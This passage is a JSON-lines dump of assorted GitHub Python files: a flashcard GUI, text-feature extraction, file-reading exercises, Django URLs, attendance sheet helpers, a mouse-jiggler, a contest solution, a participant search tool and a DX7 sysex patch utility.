else:\r\n self.ui.lblAnswer.setText(f\"Wrong. The answer is {val}.\")\r\n self.false += 1\r\n elif self.ui.rbDefinitionWord.isChecked():\r\n if reply == key:\r\n self.ui.lblAnswer.setText(\"Right\")\r\n self.true += 1\r\n try:\r\n tempFile.pop(key)\r\n except KeyError:\r\n pass\r\n else:\r\n self.ui.lblAnswer.setText(f\"Wrong. The answer is {key}.\")\r\n self.false += 1\r\n\r\n if len(tempFile) == 0:\r\n self.ui.btnAsk.setEnabled(False)\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.lblResult.setText(f\"You used all the words.{self.true} true, {self.false} false\")\r\n\r\ndef flashCard():\r\n app = QApplication(sys.argv)\r\n win = main()\r\n win.show()\r\n sys.exit(app.exec_())\r\nflashCard()\r\n","repo_name":"uckocaman/kelimeKarti_flashcard","sub_path":"DesktopApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"4922750297","text":"import numpy as np\nimport progressbar\nfrom multiprocessing import cpu_count, Pool\nfrom functools import partial\n\n\n# return the vector of labels (neg/0 or pos/1)\ndef get_class_vec(sentiment, length):\n if sentiment == 'neg':\n return np.zeros(length)\n else:\n return np.ones(length)\n\n\n# return the vocabulary for all movie reviews\ndef get_vocab(input_texts, cutoff_threshold=0):\n # para input_texts: list(list(str))\n # DATA_TAG: list(list(tuple(str,str)))\n # para cutoff_threshold: predetermined: 10546/63331 (>9)\n # return para: vocabulary list of all reviews\n # return type: list(str)\n freq_dict, vocab = dict(), list()\n\n bar = progressbar.ProgressBar()\n \n for t in bar(range(len(input_texts))):\n texts = input_texts[t]\n for text in texts:\n if text in freq_dict:\n freq_dict[text] += 1\n else:\n freq_dict[text] = 1\n for key, val in freq_dict.items():\n if val > cutoff_threshold:\n vocab.append(key)\n return vocab\n\n\n# return the vocabulart for all movie reviews (pair)\ndef get_vocab_bigram(input_texts, cutoff_threshold=0):\n # para input_texts: list(list(str))\n # DATA_TAG: list(list(tuple(str,str)))\n # para cutoff_threshold: predetermined: 10918/502596 (>14)\n # return para: vocabulary list of all reviews \n # return type: list(str)\n freq_dict, vocab = dict(), list()\n\n bar = progressbar.ProgressBar()\n\n for t in bar(range(len(input_texts))):\n texts = input_texts[t]\n for i in range(len(texts)-1):\n if (texts[i], texts[i+1]) in freq_dict:\n freq_dict[(texts[i], texts[i+1])] += 1\n else:\n freq_dict[(texts[i], texts[i+1])] = 1\n for key, val in freq_dict.items():\n if val > cutoff_threshold:\n vocab.append(key)\n return vocab\n\n\ndef get_vocab_count(input_texts):\n # return dict of vocabulary and counts\n vocab = dict()\n for texts in input_texts:\n for text in texts:\n if text in vocab:\n vocab[text] += 1\n else:\n vocab[text] = 1\n return vocab\n\n\n# return the matrix in which each row is a feature vector\ndef bag_words2vec_unigram(vocab, input_texts):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # return para: dict or copus with freq\n vec2mat = np.zeros((len(input_texts), len(vocab)))\n\n # bar = progressbar.ProgressBar()\n NUM_PROCESS = cpu_count() * 3\n pool = Pool(processes=NUM_PROCESS)\n \n vec2mat = np.array(list(pool.map(partial(words2vec_unigram, vocab), input_texts)))\n\n return vec2mat\n\n\ndef bag_words2vec_unigram_naive(vocab, input_texts):\n vec2mat = []\n for text in input_texts:\n vec2mat.append(words2vec_unigram(vocab, text))\n return np.array(vec2mat)\n\n\n# return the feature vector\ndef words2vec_unigram(vocab, input_text):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # return para: dict or copus with freq\n # return type: list[integer]\n vec_unigram = [0]*len(vocab) # vector for each review\n for word in input_text:\n if word in vocab:\n vec_unigram[vocab.index(word)] += 1 # frequency\n return vec_unigram\n\n\n# return the matrix in which each row is a feature vector (bigram)\ndef bag_words2vec_bigram(vocab, input_texts):\n # para input_texts: data & tags read from the text file\n # para input_texts: list(list(tuple(str,str)))\n # para texts: data & tags read from the text file\n # return para: dict or copus with freq\n vec2mat = np.zeros((len(input_texts), len(vocab)))\n\n # bar = progressbar.ProgressBar()\n NUM_PROCESS = cpu_count() * 3\n pool = Pool(processes=NUM_PROCESS)\n\n vec2mat = np.array(list(pool.map(partial(words2vec_bigram, vocab), input_texts)))\n \n return vec2mat\n\n\ndef bag_words2vec_bigram_naive(vocab, input_texts):\n vec2mat = []\n for text in input_texts:\n vec2mat.append(words2vec_bigram(vocab, text))\n return np.array(vec2mat)\n\n\n# return the feature vector (bigram)\ndef words2vec_bigram(vocab, input_text):\n # para input_text: data & tags read from the text file\n # para input_text: list(tuple(str,str))\n # return para: dict or copus with freq\n # return type: list[integer]\n vec_bigram = [0]*len(vocab)\n for i in range(len(input_text)-1):\n if (input_text[i], input_text[i+1]) in vocab:\n vec_bigram[vocab.index((input_text[i], input_text[i+1]))] += 1\n return vec_bigram\n\n\ndef visual_matrix(vocab, vec2mat):\n # just visualise first text\n print(\"--\"*20)\n print(\"word&tag\\t\\t\\tcount\")\n for i in range(len(vocab)):\n print(str(vocab[i]).ljust(32), vec2mat[0][i])\n\n\ndef visual_matrix_bigram(vocab, vec2mat):\n # just visualise first text\n print(\"--\"*20)\n print(\"word&tag\\tword&tag\\t\\t\\tcount\")\n for i in range(len(vocab)):\n print(vocab[i][0], vocab[i][1], str(vec2mat[0][i]).rjust(30))\n\n\ndef concatenate_feat(vec2mat_uni, vec2mat_bi):\n vec2mat = list()\n for i in range(len(vec2mat_bi)):\n vec2mat.append(vec2mat_uni[i] + vec2mat_bi[i])\n return vec2mat\n","repo_name":"KrishnaUpadhyay36/Sentimental-analysis","sub_path":"src/bow_feat.py","file_name":"bow_feat.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24237759912","text":"# READING LINE BY LINE\r\n\r\nfilename = 'PI.txt'\r\ncount = 0\r\nwith open(filename) as file_object:\r\n for line in file_object:\r\n count += 1\r\n print(f\"{count}.line {line.rstrip()}\") # WE USE RSTRIP FOR REMOVE BLANK SPACE BETWEEN EVERY LINES DELETE AND SEE !!!!!\r\n\r\n# MAKING A LIST FROM A FILE\r\nprint(\"\\n\")\r\ncount = 0\r\nwith open(filename) as file_object:\r\n lines = file_object.readlines() # USE !!!!! READLINE() AND SEE WHAT HAPPENS !!!!!\r\n everyline = file_object.readline() # SEE WHAT HAPPENS WHEN WE WANT TO READ AGAIN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nfor line in lines:\r\n count += 1\r\n print(f\"{count}.line \" + line.rstrip())\r\nprint(lines)\r\nprint(everyline) # WE WON'T SEE ANYTHING IN THE CONSOLE !!!!!\r\n\r\nwith open(filename) as file_object:\r\n lines = file_object.readline()\r\n everyline = file_object.readlines() # SEE WHAT HAPPENS WHEN WE WANT TO READ AGAIN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\ncount = 0\r\nfor line in lines:\r\n count += 1\r\n print(f\"{count}.line \" + line.rstrip())\r\nprint(lines)\r\nprint(everyline)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"egesss/Python-Study","sub_path":"Files/Files2.py","file_name":"Files2.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72329653346","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView\n\n\nurlpatterns = [\n path('api/admin/', admin.site.urls),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/swagger/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n\n path('api/user/', include('apps.users.urls')),\n path('api/warehouse/', include('apps.warehouse.urls')),\n path('api/sales/', include('apps.sales.urls')),\n path('api/finance/', include('apps.finance.urls')),\n path('api/dashboard/', include('apps.dashboard.urls')),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"code19m/project9028","sub_path":"backEnd/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39658792848","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 22:06:56 2020\n\n@author: Laraib\n\"\"\"\nimport os\nimport csv\n\n\n\n# --------------- NEW_SHEET_CREATION --------------- #\ndef create_sheets(username, filename):\n filename = filename +\".csv\"\n filename = \"Instructors/\" + username + '/' + filename\n #print(filename)\n flag = None\n with open(filename, \"w\", newline=\"\") as file:\n content = csv.writer(file)\n try:\n content.writerow(['Reg_no', 'Name', 'Date', 'Time', 'Attendance'])\n #print(\"File created successfully\")\n flag = True\n except Exception:\n #print(\"File DID NOT create successfully\")\n flag = False\n return flag\n#create_sheets(\"mona\", \"f16B\")\n\n\n\n\n\n# --------------- CHECKING_FOR_NOT_TO_DUPLICATE_FILE_NAME --------------- #\ndef check_filename(username, filename):\n flag = None\n filename = filename + \".csv\"\n dirName = \"./Instructors/\" + username\n # Get the list of all files in directory tree at given path\n listOfFiles = os.listdir(dirName)\n #print(len(listOfFiles))\n #rint(listOfFiles)\n #print(filename)\n \n for f in listOfFiles:\n if filename == f.lower():\n flag = True\n #print(\"File Exists\")\n else:\n flag = False\n #print(\"File Does not Exist\")\n if(flag):\n break\n return flag\n#check_filename(\"mona\", \"f16b.csv\")\n\n\n\n\n\n# --------------- CHECKING_IF_THERE_IS_ANY_FILE_IN_INSTRUCTOR'S_FOLDER_OR_NOT --------------- #\ndef return_listoffiles(uname):\n dirName = \"./Instructors/\" + uname\n # Get the list of all files in directory tree at given path\n listOfFiles = os.listdir(dirName)\n return listOfFiles\n\n\n","repo_name":"LaraibSaleem/AutomaticAttendanceUsingFacialRecognition","sub_path":"att_sheet_methods.py","file_name":"att_sheet_methods.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43056795548","text":"#-----------------------------\r\n# Fake Mouse\r\n# Creator: Brian Walheim\r\n# Version: 1.0\r\n#\r\n# Moves mouse randomly around the screen\r\n#-----------------------------\r\n\r\n#-------------\r\n#Imports\r\n#-------------\r\n\r\n#Pygame Imports\r\nfrom pynput.mouse import Button, Controller\r\nimport pygame\r\n\r\n#Misc\r\nimport time\r\nimport random\r\nimport sys\r\n\r\n#------------\r\n#Variables\r\n#------------\r\n\r\n#Mouse Variables\r\nmouse = Controller()\r\nactive = False\r\n\r\n#Starts Pygame\r\npygame.init()\r\npygame.display.set_mode((50,50))\r\n\r\n#-----------\r\n#Functions\r\n#-----------\r\n\r\n#Moves the mouse small random increments\r\ndef mouseMove():\r\n\r\n mouse.move(random.randint(-10,10),random.randint(-10,10))\r\n time.sleep(0.1)\r\n\r\n#----------\r\n#Main\r\n#----------\r\n\r\n#Infinite Loop\r\nwhile True:\r\n\r\n if active:\r\n mouseMove()\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.display.quit()\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_BACKQUOTE:\r\n if not active:\r\n active = True\r\n else:\r\n active = False\r\n\r\n\r\n\r\n","repo_name":"bwalheim1205/Fake-Mouse","sub_path":"Fake Mouse.pyw","file_name":"Fake Mouse.pyw","file_ext":"pyw","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17297177926","text":"from itertools import combinations as comb\nfrom sys import exit\n \n \ndef answer(ans=0):\n\tif ans:\n\t\tprint(\"YES\")\n\t\tprint(ans)\n\telse:\n\t\tprint(\"NO\")\n\texit()\n \n \ndef good(tpl):\n\tx=tpl[0]\n\ty=tpl[1]\n\tz=tpl[2]\n\tif x=0:\n\tqq=z[i:i+6]\n\tq=list(comb(qq,3))\n\tl=0\n\tr=len(q)-1\n\twhile l=0:\n\tq=z[i:i+3]\n\tif good(q):\n\t\tp1=i\n\t\tbreak\n\ti-=1\n \n \nif p1:\n\tp2=0\n\ti-=3\n\twhile i>=0:\n\t\tq=z[i:i+3]\n\t\tif good(q):\n\t\t\tp2=i\n\t\t\tbreak\n\t\ti-=1\n \n\tif p2:\n\t\tanswer(sum(z[p1:p1+3])+sum(z[p2:p2+3]))\n\telse:\n\t\tanswer()\nelse:\n\tanswer()\n \n","repo_name":"vrevt/Olympiad_code","sub_path":"python/easy.py","file_name":"easy.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30651335914","text":"#A simple search program for the Writer script\n\n#imports\nimport json\nimport time\n\n#vars\nparticipant_path = \"participant_data.json\"\nuser_data = None\n\n\n#unpack the json\ndef unpack():\n global participant_path\n global user_data\n\n openobj = open(participant_path, mode='r')\n json_data = openobj.read()\n\n user_data = json.loads(json_data)\n\n\ndef get_data_discordusr(argument):\n global user_data\n\n #search for the dict entry using given argument\n for user in user_data:\n\n if not user.find(argument) and argument != \"\":\n output = user + \" : \"+ str(user_data[user])\n break\n else:\n output = \"No user with this Discord Tag\"\n \n return output \n\n\ndef get_data_mcuser(argument):\n global user_data\n\n\n for user in user_data:\n if not user_data[user][0].find(argument) and argument != \"\":\n output = user + \" : \" + str(user_data[user])\n break\n else:\n output = \"No user with this MC User\"\n\n return output\n\n\n\ndef main():\n\n unpack()\n\n argument = input(\">\")\n\n #find the command\n if not argument.find(\"discord\"):\n\n output = get_data_discordusr(argument=argument.replace(\"discord \", \"\"))\n print(output)\n\n elif not argument.find(\"mc\"):\n\n output = get_data_mcuser(argument=argument.replace(\"mc \", \"\"))\n print(output)\n\n #show everything\n elif not argument.find(\"all\"):\n global user_data\n\n for user in user_data:\n print(user + \" : \" + str(user_data[user]) + \"\\n\")\n\n elif not argument.find(\"exit\"):\n\n print(\"exiting...\")\n time.sleep(1)\n exit()\n \n else:\n\n print(\"No argument found\")\n pass\n\n main()\n\n\n#call main\nmain()","repo_name":"Christoferis/GFormsMCReader","sub_path":"Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31437136186","text":"#!/usr/bin/python\n\n# REQUIREMENTS:\n#\n# https://bitbucket.org/techtonik/hexdump/ \n# $ pip install hexdump\n#\n\nimport os\nimport sys\nimport optparse\n#import yamahadx7_syx\n#import binascii\n#import hexdump\n#import hashlib\n#from SyxType import SyxType as SyxType\nfrom EnumTypes import FileType as FileType\nfrom EnumTypes import Synth as Synth\nfrom EnumTypes import Bank as Bank\nimport PatchHunter\nimport Utils\nimport Settings\nimport Unbuffered\n#from glob import glob\n \n# DESCRIPTION HERE:\n# Takes input directory, recursively looks for ALL .syx, and extracts UNIQUE .patch files to output directory\n# Run it \n\n\n\n\n\ndef doMenu():\n if hunter.filetype == FileType.patch:\n optionLoop(getPatchMenu())\n elif hunter.filetype == FileType.sysex:\n optionLoop(getSysexMenu())\n\n\n\ndef doHexDump():\n doDump(0)\n\ndef doPrettyDump():\n doDump(1)\n\ndef doPatchDump():\n doDump(2)\n\n# Dump code:\n#\n# 0 - hex dump\n# 1 - dump all info in human readable format\n# 2 - dump only patch name(s)\n#\ndef doDump(code):\n if len(hunter) == 0:\n print (\"\\nNothing to dump...\")\n else:\n if len(hunter) == 1:\n n = 0\n else:\n while True:\n response = Utils.safe_raw_input(\"\\nEnter number (between 1 and %d, inclusive): \"%(len(hunter)))\n try:\n n = int(response) - 1\n if (n < 0) or (n >= len(hunter)):\n raise RuntimeError\n break\n except (RuntimeError, ValueError) as e:\n print (\"\\nInvalid selection!\")\n\n filename = hunter.enumerated[n][0]\n \n dump = hunter.enumerated[n][1].prettyPrint(code)\n \n print (\"\")\n print (\"--------------------------------------------------------------------------------------------------------------------------------------\")\n print (\"File: %s\\n\"%(filename))\n print (dump)\n print (\"--------------------------------------------------------------------------------------------------------------------------------------\")\n\n doMenu()\n\ndef doSearch():\n response = Utils.safe_raw_input(\"\\nEnter search string: \")\n hits = hunter.searchByName(response)\n print (\"\")\n if len(hits) > 0: \n print (\"Found hits...\\n\")\n for hit in hits:\n print (\"%s %d: %s: %s\"%(hunter.bank.name, hit[0], hit[1], hit[2]))\n else: \n print (\"No hits found...\")\n doMenu()\n \n\ndef dumpBroken():\n print (\"\\nThe following have fields whose value could not be verified for correctness:\")\n for x in hunter.getDodgy():\n # print (\"%s: %s\"%(x[1][0], x[0])\n print (\"%d: %s: %s\"%((x[0] + 1), x[1][0], [y.value for y in x[2]]))\n\ndef doExit():\n print (\"\\nExiting...\")\n exit(0)\n\ndef doRepair():\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n print (\"\\nError: directory already exists!\")\n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n \n # Repair header, checksum + end marker (but don't do anything about patch names FIXME?)\n writecount = 0\n for x in hunter.getDodgy(): # x : [index, blob, unexpected fields list]\n blob = x[1]\n try:\n f = open(\"%s%s\"%(outputdir, os.path.basename(blob[0])), \"wb\")\n print (\"Writing: %s%s\"%(outputdir, os.path.basename(blob[0])))\n f.write(blob[1].dump(True))\n f.close()\n except IOError:\n print(\"WARNING: could not write: %s%s\"%(outputdir, os.path.basename(blob[0])))\n continue\n writecount += 1\n if writecount > 0:\n print (\"\\nSuccessfully wrote %d file(s) to: %s ...\"%(writecount, outputdir))\n else:\n print (\"\\nDid not write any files to: %s ...\"%(outputdir))\n\n #.dump(True)\n\n doMenu()\n\n\ndef doWriteUnique():\n alreadyExists = []\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n response = Utils.safe_raw_input(\"\\nWARNING: directory already exists. Continue? (y/n): \")\n if (response.upper() == 'Y'):\n alreadyExists = Utils.getAllFilenamesWithExt(outputdir, Settings.patch_file_extension)\n break \n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n\n# PYTHON 2.x:\n writecount = 0\n for key, patch in hunter.unique_patches.iteritems():\n if \"%s.%s\"%(key, Settings.patch_file_extension) in alreadyExists:\n print (\"WARNING: %s.%s already exists! Not writing...\"%(key, Settings.patch_file_extension))\n else:\n try:\n f = open(\"%s%s.%s\"%(outputdir, key, Settings.patch_file_extension), \"wb\")\n f.write(patch.dump())\n f.close()\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n writecount += 1\n if writecount > 0:\n print (\"\\nSuccessfully wrote %d .%s file(s) to: %s ...\"%(writecount, Settings.patch_file_extension, outputdir))\n else:\n print (\"\\nDid not write any .%s files to: %s ...\"%(Settings.patch_file_extension, outputdir))\n\n# PYTHON 3.x:\n# for key, value in d.items():\n\n doMenu()\n\ndef doGenSysex():\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n print (\"\\nError: directory already exists!\")\n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n\n l = hunter.genSysex()\n if len(l) > 0:\n sysex_l = l[0]\n leftover_patch_l = l[1]\n\n writecount = 0\n i = 0\n for sysex in sysex_l:\n try:\n f = open(\"%s%s%d.%s\"%(outputdir, Settings.generated_sysex_name, i, Settings.sysex_file_extension), \"wb\")\n f.write(sysex.dump())\n f.close()\n writecount += 1\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n i += 1\n\n if writecount > 0:\n print (\"\\nSuccessfully wrote %d .%s file(s) to: %s\"%(writecount, Settings.sysex_file_extension, outputdir))\n else:\n print (\"\\nDid not write any .%s files to: %s\"%(Settings.sysex_file_extension, outputdir))\n\n writecount = 0\n for patch in leftover_patch_l:\n try:\n f = open(\"%s%s.%s\"%(outputdir, patch.getHash(), Settings.patch_file_extension), \"wb\")\n f.write(patch.dump())\n f.close()\n writecount += 1\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n\n if writecount > 0:\n print (\"Successfully wrote %d .%s file(s) to: %s\"%(writecount, Settings.patch_file_extension, outputdir))\n else:\n print (\"Did not write any .%s files to: %s\"%(Settings.patch_file_extension, outputdir))\n\n \n\n\n doMenu()\n\ndef optionLoop(options):\n d = {}\n while True:\n i = 0\n print (\"\\nOPTIONS:\\n\")\n for option in options:\n print (\"%d: %s\"%((i + 1), option[0]))\n if len(d) < len(options):\n d[i + 1] = option[1]\n i += 1\n response = Utils.safe_raw_input(\"\\nEnter your selection: \")\n try:\n d[int(response)]()\n break\n except (KeyError, ValueError) as e:\n print (\"\\nInvalid selection!\")\n \n\ndef getCommonMenu():\n return [[\"Get summary\", doSummary],\n [\"Pretty dump\", doPrettyDump],\n [\"Hex dump\", doHexDump],\n [\"Patch name only dump\", doPatchDump], \n [\"Patch search\", doSearch],\n [\"Dump broken (and suspect)\", dumpBroken], # \"needs attention\" list\n [\"Repair broken\", doRepair], # FIXES CHECKSUM AND HEADER... these are PARSEABLE. THE UNPARSEABLE ONES MIGHT BE A BIT TRICKY COZ FILESIZES ARENT RIGHT!!!\n [\"Exit\", doExit]] \n\n\n\ndef getSysexMenu():\n return [[\"Write all unique patches to output directory\", doWriteUnique]] + getCommonMenu()\n\n\n\ndef getPatchMenu():\n return [[\"Generate sysex\", doGenSysex]] + getCommonMenu()\n\n\ndef doSummaryWork():\n print (\"\\nTarget synth: %s\"%(synth.value))\n print (\"Target bank: %s\"%(bank.value))\n print (\"Number of .%s files found: %d\"%(filetype.value, (len(hunter) + hunter.getFailedCount() + hunter.getInvalidCount()))) \n #print (\"Bank type: %s\"%(bank.name)\n print (\"\\nFailed to open: %d\"%(hunter.getFailedCount()))\n print (\"Failed to parse: %d\"%(hunter.getInvalidCount()))\n print (\"Successfully parsed: %d\"%(len(hunter)))\n print (\"\\nPatch count: %d\"%(hunter.patch_count))\n print (\"Unique patch count: %d\"%(len(hunter.unique_patches)))\n# Broken count?\n\ndef doSummary():\n doSummaryWork()\n doMenu()\n\n\n\ndef printHelpAndExit():\n parser.print_help()\n exit(-1)\n\n#################################################################################################################\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-i\", help=\"input directory\", dest=\"inputdir\", metavar=\" \") # required\n parser.add_option(\"-b\", help=\"bank type: %s\"%(Utils.banks), dest=\"banktype\", metavar=\"\") # required\n parser.add_option(\"-f\", help=\"file type: %s\"%(Utils.filetypes), dest=\"filetype\", metavar=\"\") # required\n parser.add_option(\"-s\", help=\"synth type: %s\"%(Utils.synths), dest=\"synthtype\", metavar=\"\") # required\n parser.add_option(\"-l\", help=\"log file\", dest=\"logfile\", metavar=\"\") # optional\n # parser.add_option(\"-o\", help=\"output directory (default: ./out)\", dest=\"outputdir\", metavar=\"\")\n parser.add_option(\"-x\", help=\"don't ask (just do)\", action=\"store_true\", dest=\"dontask\", default=False)\n (opts, args) = parser.parse_args()\n\nif (opts.logfile is not None):\n if os.path.isfile(opts.logfile):\n print(\"Error: already exists: %s\\n\"%(opts.logfile))\n printHelpAndExit()\n\n try:\n unbuffered = Unbuffered.Unbuffered(opts.logfile, sys.stdin, sys.stdout)\n except IOError:\n print(\"Error: already exists: %s\\n\"%(opts.logfile))\n printHelpAndExit()\n sys.stdout = unbuffered\n sys.stdin = unbuffered\n\n\nif (opts.inputdir is None):\n print(\"Error: not specified\\n\")\n printHelpAndExit()\n\nif not os.path.isdir(opts.inputdir):\n print(\"Error: does not exist: %s\\n\"%(opts.inputdir))\n printHelpAndExit()\n\ntry:\n bank = Bank[opts.banktype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.banktype))\n printHelpAndExit() \n\ntry:\n synth = Synth[opts.synthtype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.synthtype))\n printHelpAndExit() \n\ntry:\n filetype = FileType[opts.filetype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.filetype))\n printHelpAndExit() \n\n#if (opts.outputdir is None):\n# opts.outputdir = \"%s/out\"%(os.getcwd())\n\nprint (\"\\nInput directory: %s\"%(opts.inputdir))\nprint (\"Synth type: %s\"%(synth.value))\nprint (\"Bank type: %s\"%(bank.value))\nprint (\"File type: %s\"%(filetype.name))\nprint (\"Target file extension: .%s\"%(filetype.value))\n#print (\"Output directory: %s\"%(opts.outputdir)\n\n#if os.path.isdir(opts.outputdir):\n# print(\"\\nWARNING: output directory exists: %s\"%(opts.outputdir))\n# print(\"... this is OK, but it is your responsibility to make sure it has not been corrupted!\\n\")\n\nif (opts.dontask is False): \n print (\"\")\n response = Utils.safe_raw_input(\"Is this correct? (y/n): \")\n if (not response.upper() == 'Y'):\n print (\"\")\n print (\"Exiting!\")\n exit(0)\n \nprint (\"\")\nprint (\"Starting...\")\n\n#################################################################################################################\n\nhunter = PatchHunter.PatchHunter(opts.inputdir, synth, bank, filetype)\ndoSummaryWork()\n\n\nwhile True:\n doMenu()\n\nexit(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n################################################################################################################# DEPREACTED:\n\npatch_md5 = []\n\nif os.path.isdir(opts.outputdir):\n # Recursively enumerate all existing .patch filenames below output directory, to\n # eliminate generating redundant patches\n fn_l = [y for x in os.walk(opts.outputdir) for y in glob(os.path.join(x[0], '*.%s'%(Settings.patch_file_extension)))]\n for fn in fn_l:\n #print fn\n try:\n f1 = open(fn, \"rb\")\n data = f1.read()\n f1.close()\n patch = yamahadx7_syx.Patch(data) \n patch_md5.append(patch.getHash())\n \n\n except AssertionError as e:\n print (str(e))\n print (\"WARNING: not a valid patch file: %s (skipping!)\\n\"%(fn))\n continue \n\n except IOError:\n print (\"Error: could not open: %s\\n\"%(fn))\n exit(-1)\n\nelse:\n try:\n os.makedirs(opts.outputdir)\n except IOError:\n print (\"Error: could not create output directory: %s\\n\"%(opts.outputdir))\n exit(-1)\n\nexisting_patch_count = len(patch_md5)\n\nskipped_syx_count = 0\n\n################################################################################################################# DEPREACTED:\n\n# IN directory, list of supported extensions, target synth\n# OUT list of [ [filename, syx object], ... ]\n\n# Recursively enumerate all .syx filenames below input directory\nfn_l = [y for x in os.walk(opts.inputdir) for y in glob(os.path.join(x[0], '*.%s'%(Settings.sysex_file_extension)))]\nfor fn in fn_l:\n #print fn\n try:\n f1 = open(fn, \"rb\")\n data = f1.read()\n f1.close()\n except IOError:\n print(\"Error: could not open: %s\\n\"%(fn))\n exit(-1)\n\n md5_input = hashlib.md5(data).hexdigest()\n\n try:\n syx = yamahadx7_syx.SysEx(data) # Raises AssertionError\n md5_gen = hashlib.md5(syx.dump()).hexdigest()\n \n\n if md5_input != md5_gen:\n # The way the .syx actually is on disk, and the way we regenerate it programmatically, results in different binaries!\n # Likely culprits: checksum, .. FIXME\n if not syx.hasValidChecksum():\n print (\"The checksum on disk is: %s\"%(binascii.hexlify(syx.raw_checksum)))\n print (\"The calculated checksum is: %s\"%((hex(syx.getChecksum())[2:]).zfill(2)))\n raise AssertionError(\".syx checksum error!\")\n\n for patch in syx:\n if patch.getHash() in patch_md5:\n #print (\"Already have a patch that matches: %s\"%(patch.get_name())\n pass\n else:\n print (\"Found new patch: %s\"%(patch.get_name()))\n patch_md5.append(patch.getHash())\n try:\n f2 = open(\"%s/%s.patch\"%(opts.outputdir, patch.getHash()), \"wb\")\n f2.write(patch.dump())\n f2.close()\n except IOError:\n print(\"Error: could not write: %s/%s.patch\\n\"%(opts.outputdir, patch.getHash()))\n exit(-1)\n\n \n\n #print (\"Success: %s\"%(fn)\n\n \n\n except AssertionError as e:\n print (str(e))\n print (\"WARNING: skipping: %s\\n\"%(fn))\n skipped_syx_count += 1\n\nnew_patch_count = len(patch_md5) - existing_patch_count\nprint (\"\\nExisting patch count: %d\"%(existing_patch_count))\nprint (\"New patch count: %d\"%(new_patch_count))\nprint (\"Number of skipped .syx files: %d\\n\"%(skipped_syx_count))\n\nexit(0)\n\n\n","repo_name":"weekend-at-bernies/sysex_utils","sub_path":"Driver1.py","file_name":"Driver1.py","file_ext":"py","file_size_in_byte":16783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
